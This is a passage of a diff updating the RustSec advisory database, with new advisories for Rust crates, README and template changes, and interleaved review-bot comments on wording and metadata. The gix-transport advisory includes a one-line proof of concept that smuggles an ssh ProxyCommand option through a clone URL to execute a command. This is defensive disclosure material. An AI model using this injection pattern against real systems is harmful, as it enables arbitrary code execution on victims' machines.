+limited to, the following:
+
+  i. the right to reproduce, adapt, distribute, perform, display,
+     communicate, and translate a Work;
+ ii. moral rights retained by the original author(s) and/or performer(s);
+iii. publicity and privacy rights pertaining to a person's image or
+     likeness depicted in a Work;
+ iv. rights protecting against unfair competition in regards to a Work,
+     subject to the limitations in paragraph 4(a), below;
+  v. rights protecting the extraction, dissemination, use and reuse of data
+     in a Work;
+ vi. database rights (such as those arising under Directive 96/9/EC of the
+     European Parliament and of the Council of 11 March 1996 on the legal
+     protection of databases, and under any national implementation
+     thereof, including any amended or successor version of such
+     directive); and
+vii. other similar, equivalent or corresponding rights throughout the
+     world based on applicable law or treaty, and any national
+     implementations thereof.
+
+2. Waiver. To the greatest extent permitted by, but not in contravention
+of, applicable law, Affirmer hereby overtly, fully, permanently,
+irrevocably and unconditionally waives, abandons, and surrenders all of
+Affirmer's Copyright and Related Rights and associated claims and causes
+of action, whether now known or unknown (including existing as well as
+future claims and causes of action), in the Work (i) in all territories
+worldwide, (ii) for the maximum duration provided by applicable law or
+treaty (including future time extensions), (iii) in any current or future
+medium and for any number of copies, and (iv) for any purpose whatsoever,
+including without limitation commercial, advertising or promotional
+purposes (the "Waiver"). Affirmer makes the Waiver for the benefit of each
+member of the public at large and to the detriment of Affirmer's heirs and
+successors, fully intending that such Waiver shall not be subject to
+revocation, rescission, cancellation, termination, or any other legal or
+equitable action to disrupt the quiet enjoyment of the Work by the public
+as contemplated by Affirmer's express Statement of Purpose.
+
+3. Public License Fallback. Should any part of the Waiver for any reason
+be judged legally invalid or ineffective under applicable law, then the
+Waiver shall be preserved to the maximum extent permitted taking into
+account Affirmer's express Statement of Purpose. In addition, to the
+extent the Waiver is so judged Affirmer hereby grants to each affected
+person a royalty-free, non transferable, non sublicensable, non exclusive,
+irrevocable and unconditional license to exercise Affirmer's Copyright and
+Related Rights in the Work (i) in all territories worldwide, (ii) for the
+maximum duration provided by applicable law or treaty (including future
+time extensions), (iii) in any current or future medium and for any number
+of copies, and (iv) for any purpose whatsoever, including without
+limitation commercial, advertising or promotional purposes (the
+"License"). The License shall be deemed effective as of the date CC0 was
+applied by Affirmer to the Work. Should any part of the License for any
+reason be judged legally invalid or ineffective under applicable law, such
+partial invalidity or ineffectiveness shall not invalidate the remainder
+of the License, and in such case Affirmer hereby affirms that he or she
+will not (i) exercise any of his or her remaining Copyright and Related
+Rights in the Work or (ii) assert any associated claims and causes of
+action with respect to the Work, in either case contrary to Affirmer's
+express Statement of Purpose.
+
+4. Limitations and Disclaimers.
+
+ a. No trademark or patent rights held by Affirmer are waived, abandoned,
+    surrendered, licensed or otherwise affected by this document.
+ b. Affirmer offers the Work as-is and makes no representations or
+    warranties of any kind concerning the Work, express, implied,
+    statutory or otherwise, including without limitation warranties of
+    title, merchantability, fitness for a particular purpose, non
+    infringement, or the absence of latent or other defects, accuracy, or
+    the present or absence of errors, whether or not discoverable, all to
+    the greatest extent permissible under applicable law.
+ c. Affirmer disclaims responsibility for clearing rights of other persons
+    that may apply to the Work or any use thereof, including without
+    limitation any person's Copyright and Related Rights in the Work.
+    Further, Affirmer disclaims responsibility for obtaining any necessary
+    consents, permissions or other rights required for any use of the
+    Work.
+ d. Affirmer understands and acknowledges that Creative Commons is not a
+    party to this document and has no duty or obligation with respect to
+    this CC0 or use of the Work.
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' old/advisory-db-20230818/MAINTAINERS_GUIDE.md 
new/advisory-db-20231007/MAINTAINERS_GUIDE.md
--- old/advisory-db-20230818/MAINTAINERS_GUIDE.md       2023-08-14 
19:14:25.000000000 +0200
+++ new/advisory-db-20231007/MAINTAINERS_GUIDE.md       2023-10-03 
15:53:18.000000000 +0200
@@ -6,7 +6,7 @@
 
 This is something first-time submitters may struggle with.
  
-You can usually make changes directly to the sumbitter's branch. It's a great 
way to make CI pass and help out first-timers, but avoid making substantial 
changes to content this way without consuling the submitter.
+You can usually make changes directly to the submitter's branch. It's a great 
way to make CI pass and help out first-timers, but avoid making substantial 
changes to content this way without consulting the submitter.
 
 ## Make sure the developers of the crate in question are aware of the issue
 
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' old/advisory-db-20230818/README.md 
new/advisory-db-20231007/README.md
--- old/advisory-db-20230818/README.md  2023-08-14 19:14:25.000000000 +0200
+++ new/advisory-db-20231007/README.md  2023-10-03 15:53:18.000000000 +0200
@@ -12,7 +12,7 @@
 All our data is available on 
[osv.dev](https://osv.dev/list?ecosystem=crates.io&q=)
 and through their [API](https://osv.dev/#use-the-api).
 
-[Github Advisory Database](https://github.com/advisories/) imports our 
advisories.
+[GitHub Advisory Database](https://github.com/advisories/) imports our 
advisories.
 
 The following tools consume this advisory database and can be used for auditing
 and reporting (send PRs to add yours):
@@ -29,6 +29,8 @@
 To report a new vulnerability, open a pull request using the template below.
 See [CONTRIBUTING.md] for more information.
 
+See [HOWTO_UNMAINTAINED.md] before filing an advisory for an unmaintained 
crate.
+
 <a href="https://github.com/RustSec/advisory-db/blob/main/CONTRIBUTING.md";>
   <img alt="Report Vulnerability" width="250px" height="60px" 
src="https://rustsec.org/img/report-vuln-button.svg";>
 </a>
@@ -60,13 +62,14 @@
 #withdrawn = "YYYY-MM-DD"
 
 # URL to a long-form description of this issue, e.g. a GitHub issue/PR,
-# a change log entry, or a blogpost announcing the release (optional)
+# a change log entry, or a blogpost announcing the release (optional, except
+# for advisories using a license that requires attribution).
 url = "https://github.com/mystuff/mycrate/issues/123";
 
 # URL to additional helpful references regarding the advisory (optional)
 #references = ["https://github.com/mystuff/mycrate/discussions/1";]
 
-# Optional: Indicates the type of informational security  advisory
+# Optional: Indicates the type of informational security advisory
 #  - "unsound" for soundness issues
 #  - "unmaintained" for crates that are no longer maintained
 #  - "notice" for other informational notices
@@ -91,6 +94,13 @@
 # e.g. CVE for a C library wrapped by a -sys crate)
 #related = ["CVE-2018-YYYY", "CVE-2018-ZZZZ"]
 
+# Optional: the advisory license as an SPDX identifier. The default is 
"CC0-1.0".
+# Accepted values are "CC0-1.0" and "CC-BY-4.0".
+# When using "CC-BY-4.0", the `url` field must constain the link to the source
+# advisory. This should only be used for advisories imported for the GitHub
+# Advisory database ("GHSA").
+#license = "CC-BY-4.0"
+
 # Optional: metadata which narrows the scope of what this advisory affects
 [affected]
 # CPU architectures impacted by this vulnerability (optional).
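Review bot: two typos in the new `license` comment: "must constain the link" should be "must contain the link", and "advisories imported for the GitHub Advisory database" should be "imported from the GitHub Advisory Database" (the README capitalises it that way on the line `[GitHub Advisory Database](https://github.com/advisories/) imports our advisories.`). Since this comment is the template people copy when filing, it is worth getting the wording exact; it would also help to say what the `url` must point at, i.e. the original GHSA advisory, so the attribution requirement that the `url` comment above now refers to is unambiguous.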
@@ -129,9 +139,15 @@
 
 ## License
 
-All content in this repository is placed in the public domain.
+All content in this repository is placed in the public domain, except 
otherwise specified.
+
+[![Public 
Domain](http://i.creativecommons.org/p/zero/1.0/88x31.png)](https://github.com/RustSec/advisory-db/blob/main/LICENSES/CC0-1.0.txt)
+
+The exceptions are advisories imported from [GitHub Advisory 
Database](https://docs.github.com/en/site-policy/github-terms/github-terms-for-additional-products-and-features#advisory-database),
+placed under CC-BY 4.0 license.
+They contain a `license` field explicitly indicating their license and a `url` 
field pointing to the original advisory for proper attribution.
 
-[![Public 
Domain](http://i.creativecommons.org/p/zero/1.0/88x31.png)](https://github.com/RustSec/advisory-db/blob/main/LICENSE.txt)
+[![Creative Commons 
Attribution](https://licensebuttons.net/l/by/4.0/88x31.png)](https://github.com/RustSec/advisory-db/blob/main/LICENSES/CC-BY-4.0.txt)
 
 [//]: # (badges)
 
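Review bot: "placed in the public domain, except otherwise specified" is missing a word; "except where otherwise specified" reads correctly. Two smaller points in the same hunk: the CC0 badge is still loaded over plain `http://i.creativecommons.org/...` while the new CC-BY badge uses `https://licensebuttons.net/...`, so the page will mix schemes; and the badge link moved from `LICENSE.txt` to `LICENSES/CC0-1.0.txt` while nothing in this hunk shows the old file being removed or left as a pointer, so it is worth confirming that external references to the old path still resolve.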
@@ -151,3 +167,4 @@
 [trivy]: https://aquasecurity.github.io/trivy/
 [dependabot]: 
https://docs.github.com/en/code-security/dependabot/dependabot-security-updates/about-dependabot-security-updates
 [CONTRIBUTING.md]: 
https://github.com/RustSec/advisory-db/blob/main/CONTRIBUTING.md
+[HOWTO_UNMAINTAINED.md]: ./HOWTO_UNMAINTAINED.md
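Review bot: the new link definition `[HOWTO_UNMAINTAINED.md]: ./HOWTO_UNMAINTAINED.md` is relative, while the neighbouring `[CONTRIBUTING.md]` definition uses the absolute `https://github.com/RustSec/advisory-db/blob/main/CONTRIBUTING.md` form. The relative form only resolves when the README is rendered from inside the repository, so wherever the README is mirrored the "See [HOWTO_UNMAINTAINED.md] before filing an advisory" sentence will produce a dead link. Suggest using the same absolute URL style as the other definitions.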
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/ansi_term/RUSTSEC-2021-0139.md 
new/advisory-db-20231007/crates/ansi_term/RUSTSEC-2021-0139.md
--- old/advisory-db-20230818/crates/ansi_term/RUSTSEC-2021-0139.md      
2023-08-14 19:14:25.000000000 +0200
+++ new/advisory-db-20231007/crates/ansi_term/RUSTSEC-2021-0139.md      
2023-10-03 15:53:18.000000000 +0200
@@ -21,6 +21,7 @@
 
  The below list has not been vetted in any way and may or may not contain 
alternatives;
 
+ - [ansiterm](https://crates.io/crates/ansiterm)
  - [anstyle](https://github.com/epage/anstyle)
  - [console](https://crates.io/crates/console)
  - [nu-ansi-term](https://crates.io/crates/nu-ansi-term)
@@ -30,4 +31,4 @@
 
 ## Dependency Specific Migration(s)
 
- - [structopt, clap2](https://github.com/clap-rs/clap/discussions/4172)
\ No newline at end of file
+ - [structopt, clap2](https://github.com/clap-rs/clap/discussions/4172)
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/bcder/RUSTSEC-2023-0062.md 
new/advisory-db-20231007/crates/bcder/RUSTSEC-2023-0062.md
--- old/advisory-db-20230818/crates/bcder/RUSTSEC-2023-0062.md  1970-01-01 
01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/bcder/RUSTSEC-2023-0062.md  2023-10-03 
15:53:18.000000000 +0200
@@ -0,0 +1,26 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0062"
+package = "bcder"
+date = "2023-09-13"
+url = "https://nlnetlabs.nl/downloads/bcder/CVE-2023-39914.txt";
+categories = ["denial-of-service"]
+keywords = ["example", "freeform", "keywords"]
+aliases = ["CVE-2023-39914"]
+cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+references = ["https://github.com/NLnetLabs/bcder/pull/74";]
+
+[versions]
+patched = [">= 0.7.3"]
+```
+
+# BER/CER/DER decoder panics on invalid input
+
+Due to insufficient checking of input data, decoding certain data sequences
+can lead to _bcder_ panicking rather than returning an error. This can affect
+both the actual decoding stage as well as accessing content of types that
+utilized delayed decoding.
+
+bcder 0.7.3 fixes these issues by more thoroughly checking inputs and
+returning errors as expected.
+
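Review bot: `keywords = ["example", "freeform", "keywords"]` is the placeholder text from the advisory template and was committed unchanged; it will be exported as real keywords to consumers such as osv.dev. Either drop the field or replace it with something meaningful for this advisory (for example `"panic"`, `"asn1"`, `"der"`), matching how `quinn-proto/RUSTSEC-2023-0063.md` uses `keywords = ["panic"]` for a similar panic-on-input issue.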
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/borsh/RUSTSEC-2023-0033.md 
new/advisory-db-20231007/crates/borsh/RUSTSEC-2023-0033.md
--- old/advisory-db-20230818/crates/borsh/RUSTSEC-2023-0033.md  2023-08-14 
19:14:25.000000000 +0200
+++ new/advisory-db-20231007/crates/borsh/RUSTSEC-2023-0033.md  2023-10-03 
15:53:18.000000000 +0200
@@ -11,7 +11,7 @@
 
 [affected]
 [versions]
-patched = []
+patched = [">= 1.0.0-alpha.1"]
 ```
 
 # Parsing borsh messages with ZST which are not-copy/clone is unsound
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/dlopen_derive/RUSTSEC-2023-0051.md 
new/advisory-db-20231007/crates/dlopen_derive/RUSTSEC-2023-0051.md
--- old/advisory-db-20230818/crates/dlopen_derive/RUSTSEC-2023-0051.md  
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/dlopen_derive/RUSTSEC-2023-0051.md  
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,27 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0051"
+package = "dlopen_derive"
+date = "2023-07-30"
+url = "https://github.com/szymonwieloch/rust-dlopen/issues/47";
+informational = "unmaintained"
+
+[versions]
+patched = []
+```
+
+# `dlopen_derive` is unmaintained
+
+`dlopen_derive` hasn't been updated since June 9, 2019.
+
+`dlopen_derive` depends on [`quote = "0.6.12"`] and [`syn = "0.15.34"`]. 
Versions `1.0.0` of these dependencies were published on August 13, 2019. The 
`0.*` versions haven't received updates since.
+
+Note that `dlopen` is an unmaintained crate from the same repository as 
`dlopen_derive`. However, migrating away from `dlopen_derive` implies migrating 
away from `dlopen`, as well.
+
+## Recommended alternatives
+
+- [`dlopen2_derive`] (and `dlopen2`)
+
+[`dlopen2_derive`]: https://github.com/OpenByteDev/dlopen2
+[`quote = "0.6.12"`]: https://github.com/dtolnay/quote/releases/tag/0.6.12
+[`syn = "0.15.34"`]: https://github.com/dtolnay/syn/releases/tag/0.15.34
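Review bot: the paragraph "Note that `dlopen` is an unmaintained crate from the same repository as `dlopen_derive`. However, migrating away from `dlopen_derive` implies migrating away from `dlopen`, as well." is logically awkward: "However" signals a contrast, but the second sentence is a consequence of the first. More importantly, this advisory is filed only against `dlopen_derive`, so a project that depends on `dlopen` without the derive crate gets no warning at all, even though the text says `dlopen` is equally unmaintained. Either file a companion advisory for `dlopen` and reference it here, or reword to "`dlopen` itself is also unmaintained; migrating to `dlopen2` replaces both crates."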
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/ed25519-dalek/RUSTSEC-2022-0093.md 
new/advisory-db-20231007/crates/ed25519-dalek/RUSTSEC-2022-0093.md
--- old/advisory-db-20230818/crates/ed25519-dalek/RUSTSEC-2022-0093.md  
2023-08-14 19:14:25.000000000 +0200
+++ new/advisory-db-20231007/crates/ed25519-dalek/RUSTSEC-2022-0093.md  
2023-10-03 15:53:18.000000000 +0200
@@ -5,6 +5,7 @@
 date = "2022-06-11"
 categories = ["crypto-failure"]
 url = "https://github.com/MystenLabs/ed25519-unsafe-libs";
+aliases = ["GHSA-w5vr-6qhr-36cc"]
 
 [versions]
 patched = [">= 2"]
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/gix-transport/RUSTSEC-2023-0064.md 
new/advisory-db-20231007/crates/gix-transport/RUSTSEC-2023-0064.md
--- old/advisory-db-20230818/crates/gix-transport/RUSTSEC-2023-0064.md  
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/gix-transport/RUSTSEC-2023-0064.md  
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,25 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0064"
+package = "gix-transport"
+date = "2023-09-23"
+url = "https://github.com/Byron/gitoxide/pull/1032";
+references = ["https://secure.phabricator.com/T12961";]
+categories = ["code-execution"]
+[versions]
+patched = [">= 0.36.1"]
+```
+
+# gix-transport code execution vulnerability
+
+The `gix-transport` crate prior to the patched version 0.36.1 would allow 
attackers to
+use malicious ssh clone URLs to pass arbitrary arguments to the `ssh` program, 
leading
+to arbitrary code execution.
+
+PoC: `gix clone 'ssh://-oProxyCommand=open$IFS-aCalculator/foo'`
+
+This will launch a calculator on OSX.
+
+See https://secure.phabricator.com/T12961 for more details on similar 
vulnerabilities in `git`.
+
+Thanks for [vin01](https://github.com/vin01) for disclosing the issue.
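Review bot: the TOML front matter lacks the blank line between `categories = ["code-execution"]` and `[versions]` that every other advisory in this update has, and "Thanks for [vin01]" should read "Thanks to [vin01]". On substance, the advisory has no `aliases` and no `cvss` even though it is a code-execution issue with a working PoC; if a GHSA or CVE identifier exists for this, adding it here is what lets downstream tools deduplicate against the GitHub Advisory Database. The body could also say in one sentence why the PoC works (the host part of the URL is passed to `ssh` as a leading `-o` option, and `$IFS` supplies the space between `open` and `-aCalculator`) so readers know what the fix has to validate.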
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/inventory/RUSTSEC-2023-0057.md 
new/advisory-db-20231007/crates/inventory/RUSTSEC-2023-0057.md
--- old/advisory-db-20230818/crates/inventory/RUSTSEC-2023-0057.md      
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/inventory/RUSTSEC-2023-0057.md      
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,26 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0057"
+package = "inventory"
+date = "2023-09-10"
+url = "https://github.com/dtolnay/inventory/pull/43";
+informational = "unsound"
+keywords = ["life-before-main"]
+
+[versions]
+patched = [">= 0.2.0"]
+```
+
+# Fails to prohibit standard library access prior to initialization of Rust 
standard library runtime
+
+Affected versions allow arbitrary caller-provided code to execute before the
+lifetime of `main`.
+
+If the caller-provided code accesses particular pieces of the standard library
+that require an initialized Rust runtime, such as `std::io` or `std::thread`,
+these may not behave as documented. Panics are likely; UB is possible.
+
+The flaw was corrected by enforcing that only code written within the
+`inventory` crate, which is guaranteed not to access runtime-dependent parts of
+the standard library, runs before `main`. Caller-provided code is restricted to
+running at compile time.
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/inventory/RUSTSEC-2023-0058.md 
new/advisory-db-20231007/crates/inventory/RUSTSEC-2023-0058.md
--- old/advisory-db-20230818/crates/inventory/RUSTSEC-2023-0058.md      
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/inventory/RUSTSEC-2023-0058.md      
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,25 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0058"
+package = "inventory"
+date = "2023-09-10"
+url = "https://github.com/dtolnay/inventory/pull/42";
+informational = "unsound"
+categories = ["thread-safety"]
+keywords = ["life-before-main"]
+
+[versions]
+patched = [">= 0.2.0"]
+```
+
+# Exposes reference to non-Sync data to an arbitrary thread
+
+Affected versions do not enforce a `Sync` bound on the type of caller-provided
+value held in the plugin registry. References to these values are made
+accessible to arbitrary threads other than the one that constructed them.
+
+A caller could use this flaw to submit thread-unsafe data into inventory, then
+access it as a reference simultaneously from multiple threads.
+
+The flaw was corrected by enforcing that data submitted by the caller into
+inventory is `Sync`.
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/json/RUSTSEC-2022-0081.md 
new/advisory-db-20231007/crates/json/RUSTSEC-2022-0081.md
--- old/advisory-db-20230818/crates/json/RUSTSEC-2022-0081.md   2023-08-14 
19:14:25.000000000 +0200
+++ new/advisory-db-20231007/crates/json/RUSTSEC-2022-0081.md   2023-10-03 
15:53:18.000000000 +0200
@@ -23,6 +23,7 @@
 
 The below list has not been vetted in any way and may or may not contain 
alternatives;
 
+- [jzon](https://crates.io/crates/jzon) maintained fork of json
 - [serde_json](https://crates.io/crates/serde_json)
 - [json-deserializer](https://crates.io/crates/json-deserializer)
 - [simd-json](https://crates.io/crates/simd-json)
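Review bot: the new entry `- [jzon](https://crates.io/crates/jzon) maintained fork of json` runs the link and its description together; the other entries are bare links, so a separator such as `(maintained fork of `json`)` keeps the list readable and makes clear the description is editorial rather than part of the crate name.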
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/lexical/RUSTSEC-2023-0055.md 
new/advisory-db-20231007/crates/lexical/RUSTSEC-2023-0055.md
--- old/advisory-db-20230818/crates/lexical/RUSTSEC-2023-0055.md        
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/lexical/RUSTSEC-2023-0055.md        
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,32 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0055"
+package = "lexical"
+date = "2023-09-03"
+informational = "unsound"
+references = ["https://github.com/Alexhuszagh/rust-lexical/issues/102";, 
"https://github.com/Alexhuszagh/rust-lexical/issues/101";, 
"https://github.com/Alexhuszagh/rust-lexical/issues/95";, 
"https://github.com/Alexhuszagh/rust-lexical/issues/104";]
+
+[versions]
+patched = []
+```
+
+# Multiple soundness issues
+
+`lexical` contains multiple soundness issues:
+
+ 1. [Bytes::read() allows creating instances of types with invalid bit 
patterns](https://github.com/Alexhuszagh/rust-lexical/issues/102)
+ 1. [BytesIter::read() advances iterators out of 
bounds](https://github.com/Alexhuszagh/rust-lexical/issues/101)
+ 1. [The `BytesIter` trait has safety invariants but is public and not marked 
`unsafe`](https://github.com/Alexhuszagh/rust-lexical/issues/104)
+ 1. [`write_float()` calls `MaybeUninit::assume_init()` on uninitialized data, 
which is is not allowed by the Rust abstract 
machine](https://github.com/Alexhuszagh/rust-lexical/issues/95)
+
+The crate also has some correctness issues and appears to be unmaintained.
+
+## Alternatives
+
+For quickly parsing floating-point numbers third-party crates are no longer 
needed. A fast float parsing algorith by the author of `lexical` has been 
[merged](https://github.com/rust-lang/rust/pull/86761) into libcore.
+
+For quickly parsing integers, consider `atoi` and `btoi` crates (100% safe 
code). `atoi_radix10` provides even faster parsing, but only with `-C 
target-cpu=native`, and at the cost of some `unsafe`.
+
+For formatting integers in a `#[no_std]` context consider the 
[`numtoa`](https://crates.io/crates/numtoa) crate.
+
+For working with big numbers consider `num-bigint` and `num-traits`.
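Review bot: two typos in the prose: "A fast float parsing algorith" should be "algorithm", and "which is is not allowed by the Rust abstract machine" has a doubled "is". Also, this advisory sets `references` but no `url`; the README template treats `url` as the primary link and most tools surface it prominently, so pick one of the four issues (issue 102 is listed first) or the crate's issue tracker as `url` and keep the rest in `references`.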
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/libwebp-sys/RUSTSEC-2023-0061.md 
new/advisory-db-20231007/crates/libwebp-sys/RUSTSEC-2023-0061.md
--- old/advisory-db-20230818/crates/libwebp-sys/RUSTSEC-2023-0061.md    
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/libwebp-sys/RUSTSEC-2023-0061.md    
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,18 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0061"
+package = "libwebp-sys"
+date = "2023-09-12"
+categories = ["memory-corruption"]
+keywords = ["webp"]
+aliases = ["CVE-2023-5129", "CVE-2023-4863"]
+
+[versions]
+patched = [">= 0.9.3"]
+```
+
+# libwebp: OOB write in BuildHuffmanTable
+
+[Google](https://chromereleases.googleblog.com/2023/09/stable-channel-update-for-desktop_11.html)
 and [Mozilla](https://www.mozilla.org/en-US/security/advisories/mfsa2023-40/) 
have released security advisories for RCE due to heap overflow in libwebp. 
Google warns the vulnerability has been exploited in the wild.
+
+libwebp needs to be updated to 1.3.2 to include a patch for "OOB write in 
BuildHuffmanTable".
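Review bot: the advisory sets `patched = [">= 0.9.3"]` for the crate but the body only says "libwebp needs to be updated to 1.3.2"; it never states how the two relate. If `libwebp-sys` 0.9.3 bundles libwebp 1.3.2 the patched range is sufficient, but if the crate can link against a system libwebp then the crate version alone says nothing about whether the vulnerable code is present, and the text should tell readers to check the linked library version too. A `url` pointing at the crate release or the upstream libwebp fix would also help; currently only the Google and Mozilla release notes are linked.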
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/libwebp-sys2/RUSTSEC-2023-0060.md 
new/advisory-db-20231007/crates/libwebp-sys2/RUSTSEC-2023-0060.md
--- old/advisory-db-20230818/crates/libwebp-sys2/RUSTSEC-2023-0060.md   
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/libwebp-sys2/RUSTSEC-2023-0060.md   
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,18 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0060"
+package = "libwebp-sys2"
+date = "2023-09-12"
+categories = ["memory-corruption"]
+keywords = ["webp"]
+aliases = ["CVE-2023-5129", "CVE-2023-4863"]
+
+[versions]
+patched = [">= 0.1.8"]
+```
+
+# libwebp: OOB write in BuildHuffmanTable
+
+[Google](https://chromereleases.googleblog.com/2023/09/stable-channel-update-for-desktop_11.html)
 and [Mozilla](https://www.mozilla.org/en-US/security/advisories/mfsa2023-40/) 
have released security advisories for RCE due to heap overflow in libwebp. 
Google warns the vulnerability has been exploited in the wild.
+
+libwebp needs to be updated to 1.3.2 to include a patch for "OOB write in 
BuildHuffmanTable".
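Review bot: the body of this advisory is a verbatim copy of `libwebp-sys/RUSTSEC-2023-0061.md`, so it has the same gap: `patched = [">= 0.1.8"]` is given without saying whether 0.1.8 bundles libwebp 1.3.2 or whether users must also update a system libwebp. One sentence stating which it is for `libwebp-sys2` would make the patched range actionable, and a `url` for the fixing release is missing here as well.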
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/mail-internals/RUSTSEC-2023-0054.md 
new/advisory-db-20231007/crates/mail-internals/RUSTSEC-2023-0054.md
--- old/advisory-db-20230818/crates/mail-internals/RUSTSEC-2023-0054.md 
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/mail-internals/RUSTSEC-2023-0054.md 
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,24 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0054"
+package = "mail-internals"
+date = "2023-08-07"
+url = 
"https://git.sr.ht/~nabijaczleweli/mail-internals.crate/commit/05443c864b204e7f1512caf2d53e8cce4dd340fc";
+categories = ["memory-corruption"]
+keywords = ["mail", "mail-api"]
+aliases = ["GHSA-rcx8-48pc-v9q8"]
+
+[affected]
+functions = { "mail_internals::utils::vec_insert_bytes" = [">= 0.2.0"] }
+
+[versions]
+patched = []
+```
+
+# Use-after-free in `vec_insert_bytes`
+Incorrect reallocation logic in the function 
[`vec_insert_bytes`](https://docs.rs/mail-internals/0.2.3/mail_internals/utils/fn.vec_insert_bytes.html)
 causes a use-after-free.
+
+This function does not have to be called directly to trigger the vulnerability 
because many methods on 
[`EncodingWriter`](https://docs.rs/mail-internals/0.2.3/mail_internals/encoder/struct.EncodingWriter.html)
 call this function internally.
+
+The mail-\* suite is unmaintained and the upstream sources have been actively 
vandalised.
+A fixed `mail-internals-ng` (and `mail-headers-ng` and `mail-core-ng`) crate 
has been published which fixes this, and a dependency on another unsound crate.
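Review bot: `[affected] functions = { "mail_internals::utils::vec_insert_bytes" = [">= 0.2.0"] }` narrows the advisory to the one function, yet the body says "many methods on `EncodingWriter` call this function internally", so any tool that honours the function list would miss the realistic call path. Either list the `EncodingWriter` entry points as well or drop the function-level narrowing. Two smaller points: the heading `# Use-after-free in `vec_insert_bytes`` needs a blank line before the body text to match the other advisories, and the recommended fix, `mail-internals-ng`, is named but not linked; a crates.io link in the text (or in `references`) would save readers a search.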
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/multipart/RUSTSEC-2023-0050.md 
new/advisory-db-20231007/crates/multipart/RUSTSEC-2023-0050.md
--- old/advisory-db-20230818/crates/multipart/RUSTSEC-2023-0050.md      
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/multipart/RUSTSEC-2023-0050.md      
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,20 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0050"
+package = "multipart"
+date = "2023-04-11"
+informational = "unmaintained"
+
+[versions]
+patched = []
+```
+
+# multipart is Unmaintained
+
+The `multipart` crate is unmaintained. The author has archived the github
+repository.
+
+Alternatives:
+
+- [multer](https://crates.io/crates/multer)
+- [multiparty](https://crates.io/crates/multiparty)
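Review bot: "The author has archived the github repository" is the only evidence given for the unmaintained status, but the advisory has no `url` pointing at that repository; add it so readers can verify the archived state. Also "github" should be "GitHub", consistent with the README change in this same update.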
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' 
old/advisory-db-20230818/crates/pleaser/RUSTSEC-2023-0066.md 
new/advisory-db-20231007/crates/pleaser/RUSTSEC-2023-0066.md
--- old/advisory-db-20230818/crates/pleaser/RUSTSEC-2023-0066.md        
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/pleaser/RUSTSEC-2023-0066.md        
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,49 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0066"
+package = "pleaser"
+date = "2023-04-29"
+url = "https://gitlab.com/edneville/please/-/issues/13";
+categories = ["privilege-escalation"]
+keywords = []
